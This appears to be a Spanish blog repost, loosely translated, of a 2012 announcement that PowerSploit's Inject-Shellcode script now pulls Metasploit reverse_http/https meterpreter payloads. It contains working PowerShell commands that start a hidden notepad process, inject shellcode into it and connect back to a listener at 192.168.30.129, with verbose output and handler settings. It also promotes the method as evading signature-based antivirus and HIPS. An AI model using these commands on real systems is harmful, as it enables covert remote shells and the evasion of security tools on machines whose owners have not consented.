Saludos Mundo Libre.
Me he encontrado un articulo que dice:
PowerSploit - Nueva función: Inyectar-shellcode ahora es compatible con Metasploit http [s] cargas
PowerSploit Repo
El guión Inject-shellcode, que forma parte del proyecto PowerSploit ahora es compatible con windows / meterpreter / reverse_http y cargas útiles de ventanas / Meterpreter / reverse_https. Ahora, usted no tiene que pre-generar su código shell antes de tiempo si usted no desea. La nueva sintaxis para esta función se puede ver en los ejemplos siguientes:
Ejemplo # 1
Establece un revés https carga meterpreter desde dentro el proceso de Bloc de notas ocultas.
PS> Start-Process C:\Windows\SysWOW64\notepad.exe -WindowStyle Hidden
PS> $Proc = Get-Process notepad
PS> Inject-Shellcode -Remote -ProcessId $Proc.Id -Meterpreter_Reverse_Https -Lhost 192.168.30.129 -Lport 443 -Verbose
VERBOSE: Requesting meterpreter payload from https://192.168.30.129:443/INITM
VERBOSE: Injecting shellcode into PID: 4004
VERBOSE: Injecting into a Wow64 process.
VERBOSE: Using 32-bit shellcode.
VERBOSE: Shellcode memory reserved at 0x03BE0000
VERBOSE: Emitting 32-bit assembly call stub.
VERBOSE: Thread call stub memory reserved at 0x001B0000
VERBOSE: Shellcode injection complete!
A multi-handler was set up with the following options:
Payload options (windows/meterpreter/reverse_https):
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC thread yes Exit technique: seh, thread, process, none
LHOST 192.168.30.129 yes The local listener hostname
LPORT 443 yes The local listener port
Ejemplo # 2
Establece un revés http carga meterpreter desde dentro el proceso de ejecución de PowerShell.
Payload options (windows/meterpreter/reverse_http):
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC thread yes Exit technique: seh, thread, process, none
LHOST 192.168.30.129 yes The local listener hostname
LPORT 80 yes The local listener port
Vale la pena señalar que debido a que las inversas http [s] cargas sólo son compatibles con 32 bits, debe ejecutar los comandos de 32 bits de PowerShell. Mi plan es la adición de otros 32 y la carga útil de 64 bits en el futuro.
Como de costumbre, que me haga saber si llegas a tener algún error o tiene alguna peticiones de nuevas funcionalidades.
Por último, realmente quiero dejar sentada la idea de que mediante el uso de Inject-shellcode, que está prácticamente seguro de que no serán marcados por la firma con sede en antivirus. Así que si estás en un equipo con PowerShell, que es cada vez más probable en estos días, no más son los días en los que tendría que generar miles de archivos ejecutables Meterpreter codificados con la esperanza de que uno de ellos puede que no se marcan por AV. Además, utilizando este script, no están bajando un archivo ejecutable en el disco. En esencia, Inject-shellcode debería aliviar muchos si no todos los dolores de cabeza asociados con la ejecución de código malintencionado en un equipo con AV o productos de HIPS.
Seguir leyendo: http://www.exploit-monday.com/2012/06/powersploit-new-feature-inject.html
Fuente:http://www.exploit-monday.com/2012/06/powersploit-new-feature-inject.html
Traduccion:Dellcom1@
Saludos Mundo Libre.
No hay comentarios:
Publicar un comentario